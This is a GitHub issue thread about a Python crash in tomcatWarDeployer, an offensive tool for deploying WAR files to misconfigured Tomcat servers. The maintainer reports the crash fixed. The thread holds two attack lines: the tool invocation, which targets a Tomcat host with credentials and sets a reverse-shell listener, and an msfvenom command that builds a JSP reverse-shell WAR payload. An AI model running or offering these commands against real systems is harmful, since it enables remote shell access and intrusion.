### ISSUE TITLE
Crash when using existing war file

### ISSUE THREAD

**Issue by moshekaplan** [mgeeky/tomcatWarDeployer#13] opened 2018-10-26 19:20 UTC
Command: `# python tomcatWarDeployer-master/tomcatWarDeployer.py -x http://10.10.10.95:8080  -U tomcat -P s3cret -H LHOST=10.10.15.242 -p 22335 -f foobar_on_fire.war`

Output:

```
        tomcatWarDeployer (v. 0.5)
	Apache Tomcat auto WAR deployment & launching tool
	Mariusz B. / MGeeky '16-18

Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.
	
INFO: Reverse shell will connect to: LHOST=10.10.15.242:22335.
Traceback (most recent call last):
  File "tomcatWarDeployer-master/tomcatWarDeployer.py", line 1165, in <module>
    main()
  File "tomcatWarDeployer-master/tomcatWarDeployer.py", line 982, in main
    (opts, args) = options()
  File "tomcatWarDeployer-master/tomcatWarDeployer.py", line 965, in options
    if opts.file and not os.path.exists(file):
  File "/usr/lib/python2.7/genericpath.py", line 26, in exists
    os.stat(path)
TypeError: coercing to Unicode: need string or buffer, type found
```

**Comment by mgeeky** [comment] 2018-10-27 14:02
@moshekaplan : Thank you for that report, I will look into that issue as soon as I find some spare time.
Can you tell me how did you generated that WAR file? Using tomcatWarDeployer's options or has it been taken from elsewhere?

**Comment by moshekaplan** [comment] 2018-10-28 04:09
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.15.242 LPORT=22335 > -f war > foobar_on_fire.war

**Comment by mgeeky** [comment] 2019-01-05 22:37
Hi @moshekaplan ,

Finally I've found some time to fix that one. I hope the issue is now fixed, as I tested it.
If you have some time to give it a try - I'd be grateful :)

**Closed** 2019-04-08 15:05 UTC
Labels: fixed
